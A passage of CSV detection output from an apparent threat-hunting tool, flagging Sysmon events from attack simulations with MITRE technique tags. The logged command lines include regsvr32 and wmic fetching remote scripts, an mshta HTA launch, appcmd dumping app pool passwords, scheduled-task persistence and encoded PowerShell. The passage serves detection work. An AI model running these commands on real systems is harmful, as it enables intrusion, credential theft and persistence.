QA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABp
ACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243540 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.029 + 747F3D96-9F69-5E75-0000-0010946B2000 + 1828 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + 
C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 104.20.208.21 ) and port ( 80 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 16794 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:35:04.463 + 365ABB72-6759-5CD8-0000-0010E2D50F00 + 1420 + C:\Windows\System32\regsvr32.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.15 + IEWIN7..home + 49165 + + false + 104.20.208.21 + + 80 + http + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243540 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.029 + 747F3D96-9F69-5E75-0000-0010946B2000 + 1828 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + 
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1218.005 ] Mshta found running in the system,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta") and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine ("C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html) in directory : ( C:\Users\IEUser\Desktop\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 7648 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-15 07:13:42.278 + 365ABB72-9AA6-5D04-0000-00109C850F00 + 652 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta" + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-98E4-5D04-0000-0020A4350100 + 0x135a4 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-9972-5D04-0000-0010F0490C00 + 3660 + C:\Program Files\Internet Explorer\iexplore.exe + "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( cmd /c ping 127.0.0.1&&del del /F /Q /A:H "C:\Users\IEUser\AppData\Roaming\wwlib.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 
0x8000000000000000 + + + 417085 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 11:43:49.217 + 747F3D96-D8F5-5F8A-0000-00106B6F7300 + 1680 + C:\Windows\SysWOW64\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd /c ping 127.0.0.1&&del del /F /Q /A:H "C:\Users\IEUser\AppData\Roaming\wwlib.dll" + C:\Users\IEUser\AppData\Roaming\ + MSEDGEWIN10\IEUser + 747F3D96-CA8D-5F8A-0000-0020D1090A00 + 0xa09d1 + 1 + High + SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A + 747F3D96-D8E5-5F8A-0000-0010E1BC7200 + 2920 + C:\Users\IEUser\AppData\Roaming\WINWORD.exe + C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436008.374373,2019-07-30T01:33:28.374373+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4916 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:28.197 + 747F3D96-6628-5D3F-0000-001067768800 + 1296 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 
747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243540 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.029 + 747F3D96-9F69-5E75-0000-0010946B2000 + 1828 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta" ) contain suspicious command ( \mshta.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 7648 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-15 07:13:42.278 + 365ABB72-9AA6-5D04-0000-00109C850F00 + 652 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 
(winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta" + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-98E4-5D04-0000-0020A4350100 + 0x135a4 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-9972-5D04-0000-0010F0490C00 + 3660 + C:\Program Files\Internet Explorer\iexplore.exe + "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1088] Bypass User Account Control - Process,1555606626.954307,2019-04-18T20:57:06.954307+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\mmc.exe ) through command line ( "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 15 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1088,technique_name=Bypass User Account Control + 2019-04-18 16:57:04.500 + 365ABB72-AC60-5CB8-0000-001037BA0800 + 3900 + C:\Windows\System32\mmc.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft Management Console + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-AB27-5CB8-0000-002021CA0000 + 0xca21 + 1 + High + SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1 + 365ABB72-AC60-5CB8-0000-001002B30800 + 3904 + C:\Windows\System32\eventvwr.exe + "C:\Windows\system32\eventvwr.exe" + 
+",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1170] Detecting Mshta,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta") and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine ("C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html) in directory : ( C:\Users\IEUser\Desktop\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 7648 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-15 07:13:42.278 + 365ABB72-9AA6-5D04-0000-00109C850F00 + 652 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta" + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-98E4-5D04-0000-0020A4350100 + 0x135a4 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-9972-5D04-0000-0010F0490C00 + 3660 + C:\Program Files\Internet Explorer\iexplore.exe + "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.121924,2019-05-27T05:29:18.121924+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5913 + + + + + 
Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.081 + 365ABB72-3D6E-5CEB-0000-00100C87FF00 + 2896 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558630145.862062,2019-05-23T20:49:05.862062+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic process list /format:"https://a.uguu.se/x50IGVBRfr55_test.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 892 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-23 16:49:05.686 + 365ABB72-CF01-5CE6-0000-00105DA50C00 + 3872 + C:\Windows\System32\wbem\WMIC.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + wmic process list /format:"https://a.uguu.se/x50IGVBRfr55_test.xsl" + c:\ + IEWIN7\IEUser + 365ABB72-CE6C-5CE6-0000-002047F30000 + 0xf347 + 1 + High + SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 + 
365ABB72-CE84-5CE6-0000-001094130600 + 2940 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1557686106.562199,2019-05-12T22:35:06.562199+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16793 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:35:05.765 + 365ABB72-6759-5CD8-0000-001085031000 + 1912 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-63FC-5CD8-0000-0020EE3E0100 + 0x13eee + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-6759-5CD8-0000-0010E2D50F00 + 1420 + C:\Windows\System32\regsvr32.exe + regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557686106.562199,2019-05-12T22:35:06.562199+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16793 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:35:05.765 + 365ABB72-6759-5CD8-0000-001085031000 + 1912 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-63FC-5CD8-0000-0020EE3E0100 + 0x13eee + 1 + Medium + 
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-6759-5CD8-0000-0010E2D50F00 + 1420 + C:\Windows\System32\regsvr32.exe + regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1564436008.250664,2019-07-30T01:33:28.250664+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4915 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-29 21:33:24.152 + 747F3D96-6623-5D3F-0000-0010BC068800 + 3000 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49828 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1555606624.681038,2019-04-18T20:57:04.681038+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /user) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 14 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1033,technique_name=System Owner/User Discovery + 2019-04-18 16:56:24.833 + 365ABB72-AC38-5CB8-0000-0010365E0800 + 3576 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /user + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 
365ABB72-AB27-5CB8-0000-002021CA0000 + 0xca21 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + Powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1555606624.681038,2019-04-18T20:57:04.681038+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /user ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 14 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1033,technique_name=System Owner/User Discovery + 2019-04-18 16:56:24.833 + 365ABB72-AC38-5CB8-0000-0010365E0800 + 3576 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /user + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-AB27-5CB8-0000-002021CA0000 + 0xca21 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + Powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\schtasks.exe ) through command line ( C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" ),1," + + + + + 1 + 5 + 4 
+ 1 + 0 + 0x8000000000000000 + + + 6195 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + Persistence - Scheduled Task Management + 2019-05-27 15:12:59.558 + 365ABB72-FE7B-5CEB-0000-0010D6820C00 + 4044 + C:\Windows\System32\schtasks.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Manages scheduled tasks + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 + 365ABB72-FE7B-5CEB-0000-0010867F0C00 + 4012 + C:\Windows\System32\cmd.exe + cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.041809,2019-05-27T05:29:18.041809+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5910 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.011 + 365ABB72-3D6E-5CEB-0000-00104C83FF00 + 2472 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 
365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-11 17:58:50.075 + 365ABB72-0D5A-5CD7-0000-001069031700 + 2544 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + c:\Windows\System32\cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-8693-5CD7-0000-0020E7030000 + 0x3e7 + 0 + System + 